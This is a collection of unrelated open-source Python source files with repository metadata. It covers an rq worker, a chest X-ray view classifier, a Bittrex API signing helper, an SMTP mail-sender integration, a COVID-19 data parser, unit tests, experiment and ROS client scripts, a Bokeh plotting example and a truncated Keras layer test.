| 2023-08-11T08:45:59.641463
| 2023-07-27T13:28:58
| 2023-07-27T13:28:58
| 29,220,809
| 4,513
| 267
|
BSD-3-Clause
| 2023-09-10T20:53:11
| 2015-01-14T01:24:07
|
Python
|
UTF-8
|
Python
| false
| false
| 380
|
py
|
worker.py
|
"""Heroku web worker."""
from builtins import map
import os
import redis
from rq import Worker, Queue, Connection
listen = ['high', 'default', 'low']
redis_url = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')
conn = redis.from_url(redis_url)
if __name__ == '__main__':
with Connection(conn):
worker = Worker(list(map(Queue, listen)))
worker.work()
|
1c06460adfbb222b25b7dcab53cd34628a01a4be
|
fefcb3f05b04f9fa218a2b37790476504ad0997f
|
/torchxrayvision/baseline_models/xinario/__init__.py
|
ac97e2177c0b84242776d1a7349122072a63f524
|
[
"Apache-2.0"
] |
permissive
|
mlmed/torchxrayvision
|
d3d097765967431e8c4330473d7093d5b7abd760
|
26db733796be0caa862933bdd840717a0ded2a68
|
refs/heads/master
| 2023-09-04T13:13:50.634241
| 2023-09-01T19:56:14
| 2023-09-01T19:56:14
| 244,798,181
| 737
| 205
|
Apache-2.0
| 2023-09-01T19:53:49
| 2020-03-04T03:26:11
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,717
|
py
|
__init__.py
|
import os
from typing import List
import torch
import torch.nn as nn
import torchvision
import pathlib
import torchxrayvision as xrv
class ViewModel(nn.Module):
"""
The native resolution of the model is 320x320. Images are scaled
automatically.
`Demo notebook <https://github.com/mlmed/torchxrayvision/blob/master/scripts/view_classifier.ipynb>`__
.. code-block:: python
model = xrv.baseline_models.xinario.ViewModel()
image = xrv.utils.load_image('00027426_000.png')
image = torch.from_numpy(image)[None,...]
pred = model(image)
# tensor([[17.3186, 26.7156]]), grad_fn=<AddmmBackward0>)
model.targets[pred.argmax()]
# Lateral
Source: https://github.com/xinario/chestViewSplit
"""
targets: List[str] = ['Frontal', 'Lateral']
""""""
def __init__(self):
super(ViewModel, self).__init__()
url = "https://github.com/mlmed/torchxrayvision/releases/download/v1/xinario_chestViewSplit_resnet-50.pt"
weights_filename = os.path.basename(url)
weights_storage_folder = os.path.expanduser(os.path.join("~", ".torchxrayvision", "models_data"))
self.weights_filename_local = os.path.expanduser(os.path.join(weights_storage_folder, weights_filename))
if not os.path.isfile(self.weights_filename_local):
print("Downloading weights...")
print("If this fails you can run `wget {} -O {}`".format(url, self.weights_filename_local))
pathlib.Path(weights_storage_folder).mkdir(parents=True, exist_ok=True)
xrv.utils.download(url, self.weights_filename_local)
self.model = torchvision.models.resnet.resnet50()
try:
weights = torch.load(self.weights_filename_local)
self.model.load_state_dict(weights);
self.model = self.model.eval()
except Exception as e:
print("Loading failure. Check weights file:", self.weights_filename_local)
raise e
self.upsample = nn.Upsample(
size=(224, 224),
mode='bilinear',
align_corners=False,
)
self.norm = torchvision.transforms.Normalize(
[0.485, 0.456, 0.406],
[0.229, 0.224, 0.225],
)
def forward(self, x):
x = x.repeat(1, 3, 1, 1)
x = self.upsample(x)
# expecting values between [-1024,1024]
x = (x + 1024) / 2048
# now between [0,1]
x = self.norm(x)
return self.model(x)[:,:2] # cut off the rest of the outputs
def __repr__(self):
return "xinario-view-prediction"
|
373fd0d84580f4441262627259dad0114af6955e
|
e3bb1df7fa4c51900dec7e9ddf5295e1a80938bd
|
/hummingbot/connector/exchange/bittrex/bittrex_auth.py
|
8a8ffcbafdc2d447fa1f86d0f87c3caacc58616f
|
[
"Apache-2.0"
] |
permissive
|
CoinAlpha/hummingbot
|
0d1e2bd94de1280748647108c7d7800a09546eb8
|
c3f101759ab7e7a2165cd23a3a3e94c90c642a9b
|
refs/heads/development
| 2023-09-01T11:24:43.322137
| 2023-08-31T03:08:06
| 2023-08-31T03:08:06
| 439,330,952
| 135
| 98
|
Apache-2.0
| 2023-08-30T13:55:08
| 2021-12-17T12:50:42
|
Python
|
UTF-8
|
Python
| false
| false
| 2,536
|
py
|
bittrex_auth.py
|
import time
import hmac
import hashlib
import urllib
from typing import Dict, Any, Tuple
import ujson
class BittrexAuth:
def __init__(self, api_key: str, secret_key: str):
self.api_key = api_key
self.secret_key = secret_key
def generate_auth_dict(
self,
http_method: str,
url: str,
params: Dict[str, Any] = None,
body: Dict[str, Any] = None,
subaccount_id: str = "",
) -> Dict[str, any]:
"""
Generates the url and the valid signature to authenticate with the API endpoint.
:param http_method: String representing the HTTP method in use ['GET', 'POST', 'DELETE'].
:param url: String representing the API endpoint.
:param params: Dictionary of url parameters to be included in the api request. USED ONLY IN SOME CASES
:param body: Dictionary representing the values in a request body.
:param subaccount_id: String value of subaccount id.
:return: Dictionary containing the final 'params' and its corresponding 'signature'.
"""
# Appends params the url
def append_params_to_url(url: str, params: Dict[str, any] = {}) -> str:
if params:
param_str = urllib.parse.urlencode(params)
return f"{url}?{param_str}"
return url
def construct_content_hash(body: Dict[str, any] = {}) -> Tuple[str, bytes]:
json_byte: bytes = "".encode()
if body:
json_byte = ujson.dumps(body).encode()
return hashlib.sha512(json_byte).hexdigest(), json_byte
return hashlib.sha512(json_byte).hexdigest(), json_byte
timestamp = str(int(time.time() * 1000))
url = append_params_to_url(url, params)
content_hash, content_bytes = construct_content_hash(body)
content_to_sign = "".join([timestamp, url, http_method, content_hash, subaccount_id])
signature = hmac.new(self.secret_key.encode(), content_to_sign.encode(), hashlib.sha512).hexdigest()
# V3 Authentication headers
headers = {
"Api-Key": self.api_key,
"Api-Timestamp": timestamp,
"Api-Content-Hash": content_hash,
"Api-Signature": signature,
"Content-Type": "application/json",
"Accept": "application/json",
}
if subaccount_id:
headers.update({"Api-Subaccount-Id": subaccount_id})
return {"headers": headers, "body": content_bytes, "url": url}
|
16301d41efdf88f3e287842695d92fa66a8c81c3
|
2a1b8a671aceda6bc446f8ce26400aa84fa444a6
|
/Packs/MailSenderNew/Integrations/MailSenderNew/MailSenderNew.py
|
c57a6eb672ffe091a3d122d7fe26f2a98d15c986
|
[
"MIT"
] |
permissive
|
demisto/content
|
6d4722d46f0ff0beea2748e9f7de585bf91a78b4
|
890def5a0e0ae8d6eaa538148249ddbc851dbb6b
|
refs/heads/master
| 2023-09-04T00:02:25.618032
| 2023-09-03T21:56:22
| 2023-09-03T21:56:22
| 60,525,392
| 1,023
| 1,921
|
MIT
| 2023-09-14T20:55:24
| 2016-06-06T12:17:02
|
Python
|
UTF-8
|
Python
| false
| false
| 15,604
|
py
|
MailSenderNew.py
|
import demistomock as demisto # noqa: F401
from CommonServerPython import * # noqa: F401
import contextlib
from typing import NoReturn
from email.mime.audio import MIMEAudio
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.message import Message
from email.header import Header
from smtplib import SMTP, SMTP_SSL
from smtplib import SMTPRecipientsRefused
import base64
import json
import mimetypes
from email import encoders
import re
import random
import string
import smtplib
import traceback
import sys
from itertools import zip_longest
SERVER: Optional[smtplib.SMTP] = None
UTF_8 = 'utf-8'
def randomword(length):
"""
Generate a random string of given length
"""
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length))
def return_error_mail_sender(data) -> NoReturn: # type: ignore
"""
Return error as result and exit
"""
if SERVER:
# quite may throw if the connection was closed already
with contextlib.suppress(Exception):
SERVER.quit()
return_error(data)
def guess_type(filename):
"""
Return the maintype and subtype guessed based on the extension
"""
content_type, encoding = mimetypes.guess_type(filename)
if content_type is None or encoding is not None:
# No guess could be made, or the file is encoded (compressed), so
# use a generic bag-of-bits type.
content_type = 'application/octet-stream'
return content_type.split('/', 1)
def handle_file(msg, filename, maintype, subtype, cid, data):
"""
Add the attachment to the message and add the relevant header
"""
if maintype == 'text':
# UTF-8 is a pretty safe bet
att = MIMEText(data, subtype, UTF_8) # type: MIMEBase
elif maintype == 'image':
att = MIMEImage(data, subtype)
elif maintype == 'audio':
att = MIMEAudio(data, subtype)
elif maintype == 'message':
att = MIMEBase(maintype, subtype)
att.set_payload(data)
else:
att = MIMEBase(maintype, subtype)
att.set_payload(data)
# Encode the payload using Base64
encoders.encode_base64(att)
# Set the filename parameter
if cid:
att.add_header('Content-Disposition', 'inline', filename=filename)
att.add_header('Content-ID', '<' + cid + '>')
else:
att.add_header('Content-Disposition', 'attachment', filename=filename)
msg.attach(att)
def handle_html(html_body):
"""
Extract all data-url content from within the html and return as separate attachments.
Due to security implications, we support only images here
We might not have Beautiful Soup so just do regex search
"""
attachments = []
clean_body = ''
last_index = 0
for i, m in enumerate(
re.finditer(r'<img.+?src=\"(data:(image/.+?);base64,([a-zA-Z0-9+/=\r\n]+?))\"', html_body, re.I)):
maintype, subtype = m.group(2).split('/', 1)
name = 'image%d.%s' % (i, subtype)
att = {
'maintype': maintype,
'subtype': subtype,
'data': base64.b64decode(m.group(3)),
'name': name,
'cid': '%r@%r.%r' % (name, randomword(8), randomword(8))
}
attachments.append(att)
clean_body += html_body[last_index:m.start(1)] + 'cid:' + att['cid']
last_index = m.end() - 1
clean_body += html_body[last_index:]
return clean_body, attachments
def collect_manual_attachments():
attachments = []
manual_attach_obj: List[Dict[Any, Any]] = demisto.getArg('manualAttachObj') or []
for attachment in manual_attach_obj:
res = demisto.getFilePath(os.path.basename(attachment['RealFileName']))
path = res['path']
maintype, subtype = guess_type(attachment['FileName'])
data: str | bytes # Because of mypy errors.
if maintype == 'text':
with open(path) as fp:
data = fp.read()
else:
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': attachment['FileName'],
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': ''
})
return attachments
def collect_attachments():
"""
Collect all attachments into a list with all data
"""
attachments = []
attach_ids = argToList(demisto.getArg('attachIDs'))
attach_names = argToList(demisto.getArg('attachNames'))
attach_cids = argToList(demisto.getArg('attachCIDs'))
for i, aid in enumerate(attach_ids):
try:
file_res = demisto.getFilePath(aid)
path = file_res['path']
if len(attach_names) > i and attach_names[i]:
filename = attach_names[i]
else:
filename = file_res['name']
if len(attach_cids) > i and attach_cids[i]:
cid = attach_cids[i]
else:
cid = ''
maintype, subtype = guess_type(filename)
data: str | bytes # Because of mypy errors.
if maintype == 'text':
with open(path) as fp:
data = fp.read()
else:
with open(path, 'rb') as fp:
data = fp.read()
attachments.append({
'name': filename,
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': cid
})
except Exception as exc:
demisto.error("Invalid entry {} with exception: {}".format(aid, exc))
return_error_mail_sender('Entry %s is not valid or is not a file entry' % aid)
# handle transient files
args = demisto.args()
f_names = args.get('transientFile', [])
f_names = f_names if isinstance(f_names, (list, tuple)) else f_names.split(',')
f_contents = args.get('transientFileContent', [])
f_contents = f_contents if isinstance(f_contents, (list, tuple)) else f_contents.split(',')
f_cids = args.get('transientFileCID', [])
f_cids = f_cids if isinstance(f_cids, (list, tuple)) else f_cids.split(',')
for name, data, cid in zip_longest(f_names, f_contents, f_cids):
if name is None or data is None:
break
maintype, subtype = guess_type(name)
attachments.append({
'name': name,
'maintype': maintype,
'subtype': subtype,
'data': data,
'cid': cid
})
return attachments
def parse_params(params):
actual_params = {}
# Build a simple key/value
for p in params:
if params[p].get('value'):
actual_params[p] = params[p]['value']
elif params[p].get('key'):
actual_params[p] = demisto.dt(demisto.context(), params[p]['key'])
return actual_params
def parse_template_params():
"""
Translate the template params if they exist from the context
"""
params_str = demisto.getArg('templateParams')
if params_str:
if isinstance(params_str, dict):
return parse_params(params_str)
else:
try:
return parse_params(json.loads(params_str))
except (ValueError, TypeError) as e:
return_error_mail_sender('Unable to parse templateParams: %s' % (str(e)))
def header(s):
if not s:
return None
s_no_newlines = ' '.join(s.splitlines())
return Header(s_no_newlines)
def create_msg():
"""
Will get args from demisto object
Return: a string representation of the message, to, cc, bcc
"""
# Collect all parameters
to = argToList(demisto.getArg('to'))
cc = argToList(demisto.getArg('cc'))
bcc = argToList(demisto.getArg('bcc'))
additional_header = argToList(demisto.getArg('additionalHeader'))
subject = demisto.getArg('subject') or ''
body = demisto.getArg('body') or ''
html_body = demisto.getArg('htmlBody') or ''
reply_to = demisto.getArg('replyTo')
template_params = parse_template_params()
if template_params:
body = body.format(**template_params)
html_body = html_body.format(**template_params)
# Basic validation - we allow pretty much everything, but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error_mail_sender('You must have at least one recipient')
attachments = collect_attachments()
attachments.extend(collect_manual_attachments())
# Let's see what type of message we are talking about
if not html_body:
# This is a simple text message - we cannot have CIDs here
if len(attachments) > 0:
# This is multipart - default is mixed
msg = MIMEMultipart() # type: Message
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
msg.attach(MIMEText(body, 'plain', UTF_8))
for att in attachments:
handle_file(msg, att['name'], att['maintype'], att['subtype'], None, att['data'])
else:
# Just text, how boring
msg = MIMEText(body, 'plain', UTF_8)
else:
html_body, html_attachments = handle_html(html_body)
attachments += html_attachments
if len(attachments) > 0:
msg = MIMEMultipart()
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
if body:
alt = MIMEMultipart('alternative')
alt.attach(MIMEText(body, 'plain', UTF_8))
alt.attach(MIMEText(html_body, 'html', UTF_8))
msg.attach(alt)
else:
msg.attach(MIMEText(html_body, 'html', UTF_8))
for att in attachments:
handle_file(msg, att['name'], att['maintype'], att['subtype'], att['cid'], att['data'])
else:
if body:
msg = MIMEMultipart('alternative')
msg.preamble = 'The message is only available on a MIME-aware mail reader.\n'
msg.attach(MIMEText(body, 'plain', UTF_8))
msg.attach(MIMEText(html_body, 'html', UTF_8))
else:
msg = MIMEText(html_body, 'html', UTF_8)
# Add the relevant headers to the most outer message
msg['Subject'] = header(subject)
msg['From'] = header(demisto.getParam('from'))
if reply_to:
msg['Reply-To'] = header(reply_to)
if to:
msg['To'] = header(','.join(to))
if cc:
msg['CC'] = header(','.join(cc))
if additional_header:
for h in additional_header:
header_name_and_value = h.split('=', 1)
msg[header_name_and_value[0]] = header(header_name_and_value[1])
# Notice we should not add BCC header since Python2 does not filter it
return body, html_body, msg.as_string(), to, cc, bcc
def get_user_pass():
credentials: Dict[str, Any] = demisto.getParam('credentials') # noqa
if credentials:
return (str(credentials.get('identifier', '')),
str(credentials.get('password', '')))
return None, None
def swap_stderr(new_stderr):
"""
swap value of stderr if given, return old value.
smtplib uses `sys.stderr` directly in newer versions, so use that instead
"""
if hasattr(smtplib, 'stderr'):
module = smtplib
else:
module = sys # type: ignore
old_stderr = getattr(module, 'stderr')
if new_stderr:
setattr(module, 'stderr', new_stderr)
return old_stderr
def main():
# Following methods raise exceptions so no need to check for return codes
# But we do need to catch them
global SERVER
from_email = demisto.getParam('from')
fqdn = demisto.params().get('fqdn')
fqdn = (fqdn and fqdn.strip()) or None
tls = demisto.getParam('tls')
stderr_org = None
try:
if demisto.command() == 'test-module':
stderr_org = swap_stderr(LOG)
smtplib.SMTP.debuglevel = 1
# TODO - support for non-valid certs
if tls == 'SSL/TLS':
SERVER = SMTP_SSL(demisto.getParam('host'), int(demisto.params().get('port', 0)), local_hostname=fqdn)
else:
SERVER = SMTP(demisto.getParam('host'), # type: ignore[assignment]
int(demisto.params().get('port', 0)), local_hostname=fqdn)
SERVER.ehlo() # type: ignore
# For BC purposes where TLS was a checkbox (no value only true or false) if TLS=True or TLS='STARTTLS' we enter
# this condition, otherwise it means TLS is not configured (TLS=False) or is set to 'SSL/TLS' or 'None'.
if tls is True or tls == 'STARTTLS' or str(tls).lower() == 'true':
SERVER.starttls() # type: ignore
user, password = get_user_pass()
if user:
SERVER.login(user, password) # type: ignore[union-attr]
except Exception as e:
# also reset at the bottom finally
swap_stderr(stderr_org) # type: ignore[union-attr]
smtplib.SMTP.debuglevel = 0
demisto.error('Failed test: {}\nStack trace: {}'.format(e, traceback.format_exc()))
return_error_mail_sender(e)
return # so mypy knows that we don't continue after this
# -- COMMANDS --
try:
if demisto.command() == 'test-module':
msg = MIMEText('This is a test mail from Demisto\nRegards\nDBot') # type: Message
msg['Subject'] = 'Test mail from Demisto'
msg['From'] = from_email
msg['To'] = from_email
SERVER.sendmail(from_email, [from_email], msg.as_string()) # type: ignore[union-attr]
SERVER.quit() # type: ignore[union-attr]
demisto.results('ok')
elif demisto.command() == 'send-mail':
raw_message = demisto.getArg('raw_message')
if raw_message:
to = argToList(demisto.getArg('to'))
cc = argToList(demisto.getArg('cc'))
bcc = argToList(demisto.getArg('bcc'))
str_msg = raw_message
html_body = raw_message
else:
(_, html_body, str_msg, to, cc, bcc) = create_msg()
SERVER.sendmail(from_email, to + cc + bcc, str_msg) # type: ignore[union-attr]
SERVER.quit()
render_body = argToBoolean(demisto.getArg('renderBody') or False)
results = [CommandResults(entry_type=EntryType.NOTE, raw_response='Mail sent successfully')]
if render_body:
results.append(CommandResults(
entry_type=EntryType.NOTE,
content_format=EntryFormat.HTML,
raw_response=html_body,
))
return_results(results)
else:
return_error_mail_sender('Command not recognized')
except SMTPRecipientsRefused as e:
error_msg = ''.join('{}\n'.format(val) for key, val in e.recipients.items())
return_error_mail_sender("Encountered error: {}".format(error_msg))
except Exception as e:
return_error_mail_sender(e)
finally:
swap_stderr(stderr_org) # type: ignore[union-attr]
smtplib.SMTP.debuglevel = 0
# python2 uses __builtin__ python3 uses builtins
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
1fee12437db5af033aa0e18ccddf8722a67a3087
|
a0736beb3269a71b2f5b13cafe8fb5e7f6f540f4
|
/src/pipelines/epidemiology/ru_covid19_russia.py
|
6173f9dec2e8c66008e2540401181be9a60429e9
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
GoogleCloudPlatform/covid-19-open-data
|
d9e467fadbfc71686e30e28f3ce1d438e8fd92ba
|
1123ce02a0b4059d6acd4c4446f3f9b8335018f1
|
refs/heads/main
| 2023-08-02T23:57:12.785363
| 2022-10-23T22:26:29
| 2022-10-23T22:26:29
| 282,079,576
| 489
| 146
|
Apache-2.0
| 2022-09-05T12:00:37
| 2020-07-23T23:43:51
|
Python
|
UTF-8
|
Python
| false
| false
| 1,679
|
py
|
ru_covid19_russia.py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Any, Dict
from pandas import DataFrame
from lib.io import read_file
from lib.data_source import DataSource
from lib.utils import pivot_table
_column_adapter = {
"confirmed": "total_confirmed",
"deaths": "total_deceased",
"recovered": "total_recovered",
}
class RussiaCovid19DataSource(DataSource):
def parse(self, sources: Dict[Any, str], aux: Dict[str, DataFrame], **parse_opts) -> DataFrame:
with open(sources[0], "r") as fh:
data = json.load(fh)
records = []
for subregion1_name, timeseries in data.items():
record = {
"country_code": "RU",
"subregion2_code": None,
"locality_code": None,
"match_string": subregion1_name.lower(),
}
for row in timeseries:
records.append(dict(record, **row))
cast_cols = list(_column_adapter.values())
data = DataFrame.from_records(records).rename(columns=_column_adapter)
data[cast_cols] = data[cast_cols].astype(int)
return data
|
3131936a4caeae6956936c2111de639d7484303d
|
93b28d4948b7de5913a8b8748259435443b0ac05
|
/tests_app/tests/unit/utils/tests.py
|
b709c13667c63ce2d201f04740aea9e23a0883d3
|
[
"MIT"
] |
permissive
|
chibisov/drf-extensions
|
79ea734e652729c4ea42fdf1bb65f1907efa75b6
|
f7de5c0278371d35efc3f8ff929fcccdfb641c21
|
refs/heads/master
| 2023-08-04T03:08:24.966415
| 2023-05-29T11:31:56
| 2023-05-29T11:31:56
| 11,654,191
| 1,291
| 240
|
MIT
| 2023-05-29T11:31:58
| 2013-07-25T07:06:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,451
|
py
|
tests.py
|
import contextlib
try:
from unittest import mock
except ImportError:
import mock
from django.test import TestCase
from rest_framework_extensions.utils import prepare_header_name, get_rest_framework_version
@contextlib.contextmanager
def parsed_version(version):
with mock.patch('rest_framework.VERSION', version):
yield get_rest_framework_version()
class TestPrepareHeaderName(TestCase):
def test_upper(self):
self.assertEqual(prepare_header_name('Accept'), 'HTTP_ACCEPT')
def test_replace_dash_with_underscores(self):
self.assertEqual(
prepare_header_name('Accept-Language'), 'HTTP_ACCEPT_LANGUAGE')
def test_strips_whitespaces(self):
self.assertEqual(
prepare_header_name(' Accept-Language '), 'HTTP_ACCEPT_LANGUAGE')
def test_adds_http_prefix(self):
self.assertEqual(
prepare_header_name('Accept-Language'), 'HTTP_ACCEPT_LANGUAGE')
def test_get_rest_framework_version_exotic_version(self):
"""See <https://github.com/chibisov/drf-extensions/pull/198>"""
with parsed_version('1.2alphaSOMETHING') as version:
self.assertEqual(version, (1, 2, 'alpha', 'SOMETHING'))
def test_get_rest_framework_version_normal_version(self):
"""See <https://github.com/chibisov/drf-extensions/pull/198>"""
with parsed_version('3.14.16') as version:
self.assertEqual(version, (3, 14, 16))
|
456359985cc8af31bbf9112ab30dde80b2c9a375
|
7baea78a8148d86d135b82c30cb04e339ae5e3d3
|
/experiment_utils/run_sweep.py
|
1d7cff9e269c3ecd31636bc226bc852b32b3508e
|
[
"MIT"
] |
permissive
|
jonasrothfuss/ProMP
|
6fd4fedc9868f2869b9799258edef457442f13af
|
93ae339e23dfc6e1133f9538f2c7cc0ccee89d19
|
refs/heads/master
| 2022-11-08T17:41:00.244966
| 2019-09-06T08:53:26
| 2019-09-06T08:53:26
| 143,927,841
| 241
| 56
|
MIT
| 2022-09-30T18:34:06
| 2018-08-07T21:18:07
|
Python
|
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
run_sweep.py
|
import sys
import os
import argparse
import itertools
from experiment_utils import config
from experiment_utils.utils import query_yes_no
import doodad as dd
import doodad.mount as mount
import doodad.easy_sweep.launcher as launcher
from doodad.easy_sweep.hyper_sweep import run_sweep_doodad
def run_sweep(run_experiment, sweep_params, exp_name, instance_type='c4.xlarge'):
parser = argparse.ArgumentParser()
parser.add_argument('--mode', type=str, default='local',
help='Mode for running the experiments - local: runs on local machine, '
'ec2: runs on AWS ec2 cluster (requires a proper configuration file)')
args = parser.parse_args(sys.argv[1:])
local_mount = mount.MountLocal(local_dir=config.BASE_DIR, pythonpath=True)
docker_mount_point = os.path.join(config.DOCKER_MOUNT_DIR, exp_name)
sweeper = launcher.DoodadSweeper([local_mount], docker_img=config.DOCKER_IMAGE, docker_output_dir=docker_mount_point,
local_output_dir=os.path.join(config.DATA_DIR, 'local', exp_name))
sweeper.mount_out_s3 = mount.MountS3(s3_path='', mount_point=docker_mount_point, output=True)
if args.mode == 'ec2':
print("\n" + "**********" * 10 + "\nexp_prefix: {}\nvariants: {}".format(exp_name, len(list(itertools.product(*[value for value in sweep_params.values()])))))
if query_yes_no("Continue?"):
sweeper.run_sweep_ec2(run_experiment, sweep_params, bucket_name=config.S3_BUCKET_NAME, instance_type=instance_type,
region='us-west-1', s3_log_name=exp_name, add_date_to_logname=False)
elif args.mode == 'local_docker':
mode_docker = dd.mode.LocalDocker(
image=sweeper.image,
)
run_sweep_doodad(run_experiment, sweep_params, run_mode=mode_docker,
mounts=sweeper.mounts)
elif args.mode == 'local':
sweeper.run_sweep_serial(run_experiment, sweep_params)
elif args.mode == 'local_singularity':
mode_singularity = dd.mode.LocalSingularity(
image='~/meta_policy_search.simg')
run_sweep_doodad(run_experiment, sweep_params, run_mode=mode_singularity,
mounts=sweeper.mounts)
else:
raise NotImplementedError
|
9970e015406e79cc76f2e3e42b01d5121cb426ba
|
c72be999abf8848a7d09264ba9ee7bae30f4524a
|
/autopnp_tool_change/scripts/change_tool_client.py~
|
cc8c3e94e566710063a639f623edddb842f12ea5
|
[] |
no_license
|
ipa-rmb/autopnp
|
8399be67c1a3de61e01619dc8677c52728ffd836
|
f25517a093c772a1481bcff3e9da055d4c627954
|
refs/heads/indigo_dev
| 2022-05-05T01:57:05.858437
| 2022-04-29T07:31:42
| 2022-04-29T07:31:42
| 3,398,225
| 144
| 101
| null | 2019-07-08T06:11:13
| 2012-02-09T15:30:28
|
C
|
UTF-8
|
Python
| false
| false
| 2,160
|
change_tool_client.py~
|
#!/usr/bin/python
import roslib; roslib.load_manifest('autopnp_tool_change')
import rospy
import actionlib
import autopnp_tool_change.msg
def go_to_start_position_client(goal):
go_to_start_position_client = actionlib.SimpleActionClient('go_to_start_position_action', autopnp_tool_change.msg.GoToStartPositionAction)
go_to_start_position_client.wait_for_server()
# Creates a goal to send to the action server.
goal = autopnp_tool_change.msg.GoToStartPositionGoal()
goal.goal = "default"
# Sends the goal to the action server.
go_to_start_position_client.send_goal(goal)
# Waits for the server to finish performing the action.
finished_before_timeout = go_to_start_position_client.wait_for_result(rospy.Duration(300, 0))
if finished_before_timeout:
state = go_to_start_position_client.get_state()
print "Action finished: %s"%state
# Prints out the result of executing the action
return state # State after waiting for GoToStartPositionAction
def move_to_chosen_tool_client(goal):
move_to_chosen_tool_client = actionlib.SimpleActionClient('move_to_chosen_tool_action', autopnp_tool_change.msg.MoveToChosenToolAction)
move_to_chosen_tool_client.wait_for_server()
# Creates a goal to send to the action server.
goal = autopnp_tool_change.msg.MoveToChosenToolGoal()
goal.goal = "tag_38"
# Sends the goal to the action server.
move_to_chosen_tool_client.send_goal(goal)
# Waits for the server to finish performing the action.
finished_before_timeout = move_to_chosen_tool_client.wait_for_result(rospy.Duration(300, 0))
if finished_before_timeout:
state = move_to_chosen_tool_client.get_state()
print "Action finished: %s"%state
# Prints out the result of executing the action
return state # State after waiting for MoveToChosenToolAction
if __name__ == '__main__':
try:
# Initializes a rospy node so that the SimpleActionClient can
# publish and subscribe over ROS.
rospy.init_node('GoToStartPosition_client_py')
result = go_to_start_position_client("default")
//result = move_to_chosen_tool_client("tag_38")
except rospy.ROSInterruptException:
print "program interrupted before completion"
|
|
98ed6f824f8fbeba65e20a6f594b5eca814d1a18
|
5105403f2b75990654519438d8ceabcf80962ebf
|
/docs/bokeh/source/docs/first_steps/examples/first_steps_4_datetime_axis.py
|
6221cf0aa1e9ea3dd1395cbe871482d72a82cf8b
|
[
"BSD-3-Clause"
] |
permissive
|
bokeh/bokeh
|
ed1d81eb07d27d27c6710c9fec9114886047f528
|
310cb2cbeabc4c4b8180cbda566df16039737cdc
|
refs/heads/branch-3.3
| 2023-08-31T23:53:06.537061
| 2023-08-30T03:43:05
| 2023-08-30T03:43:05
| 3,834,332
| 17,174
| 5,251
|
BSD-3-Clause
| 2023-09-14T11:37:23
| 2012-03-26T15:40:01
|
Python
|
UTF-8
|
Python
| false
| false
| 792
|
py
|
first_steps_4_datetime_axis.py
|
import random
from datetime import datetime, timedelta
from bokeh.models import DatetimeTickFormatter, NumeralTickFormatter
from bokeh.plotting import figure, show
# generate list of dates (today's date in subsequent weeks)
dates = [(datetime.now() + timedelta(day * 7)) for day in range(0, 26)]
# generate 25 random data points
y = random.sample(range(0, 100), 26)
# create new plot
p = figure(
title="datetime axis example",
x_axis_type="datetime",
sizing_mode="stretch_width",
max_width=500,
height=250,
)
# add renderers
p.circle(dates, y, size=8)
p.line(dates, y, color="navy", line_width=1)
# format axes ticks
p.yaxis[0].formatter = NumeralTickFormatter(format="$0.00")
p.xaxis[0].formatter = DatetimeTickFormatter(months="%b %Y")
# show the results
show(p)
|
1c1745802ccd5379ffefa137afdacc3962cfdbe8
|
e5e0d729f082999a9bec142611365b00f7bfc684
|
/tensorflow/python/keras/layers/core_test.py
|
c9437052081942fff4c4d6e5cf2138ae6b1480fd
|
[
"Apache-2.0"
] |
permissive
|
NVIDIA/tensorflow
|
ed6294098c7354dfc9f09631fc5ae22dbc278138
|
7cbba04a2ee16d21309eefad5be6585183a2d5a9
|
refs/heads/r1.15.5+nv23.03
| 2023-08-16T22:25:18.037979
| 2023-08-03T22:09:23
| 2023-08-03T22:09:23
| 263,748,045
| 763
| 117
|
Apache-2.0
| 2023-07-03T15:45:19
| 2020-05-13T21:34:32
|
C++
|
UTF-8
|
Python
| false
| false
| 16,420
|
py
|
core_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras core layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.mixed_precision.experimental import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class DropoutLayersTest(keras_parameterized.TestCase):
def test_dropout(self):
testing_utils.layer_test(
keras.layers.Dropout, kwargs={'rate': 0.5}, input_shape=(3, 2))
testing_utils.layer_test(
keras.layers.Dropout,
kwargs={'rate': 0.5,
'noise_shape': [3, 1]},
input_shape=(3, 2))
def test_dropout_supports_masking(self):
dropout = keras.layers.Dropout(0.5)
self.assertEqual(True, dropout.supports_masking)
def test_spatial_dropout_1d(self):
testing_utils.layer_test(
keras.layers.SpatialDropout1D,
kwargs={'rate': 0.5},
